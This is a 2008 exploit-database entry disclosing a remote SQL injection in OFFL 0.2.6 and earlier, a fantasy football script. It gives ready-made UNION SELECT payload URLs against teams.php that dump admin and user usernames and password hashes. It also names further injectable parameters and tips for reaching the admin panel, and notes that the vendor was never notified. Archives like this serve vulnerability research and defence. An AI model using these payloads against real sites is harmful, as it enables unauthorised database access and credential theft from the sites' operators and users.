OFFL - exploit.company

vendor:

OFFL

by:

t0pP8uZz

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: OFFL

Affected Version From: OFFL 0.2.6 and prior versions

Affected Version To: OFFL 0.2.6 and prior versions

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

OFFL <= 0.2.6 Remote SQL Injection Vulnerability

OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys. SQL Injections below, there are various other spots which are injectable too... including " leagues.php?league_id=1' ", " players.php?player_id=190' ". For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/* For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/*

Mitigation:

Vendor Has Not Been Notified!

Source

Exploit-DB raw data:

-[*]+================================================================================+[*]-
-[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
-[*]+================================================================================+[*]-



[*] Discovered By: t0pP8uZz
[*] Discovered On: 19 JUNE 2008
[*] Script Download: http://downloads.sourceforge.net/offl
[*] DORK: N/A



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION: 

	OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys.
	
	SQL Injections below, there are various other spots which are injectable too...
 
	including " leagues.php?league_id=1' ", " players.php?player_id=190' " 	



[*] SQL Injection:

For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/*
For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/*



[*] NOTE/TIP: 

	admin area is at "admin.php" login using the normal login page first.
	passwords are encrypted in MD5

	no effcient dork, sql columns may vary on some sites.

[*] GREETZ: 

	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !



[-] Peace...

	...t0pP8uZz !



-[*]+================================================================================+[*]-
-[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-06-21]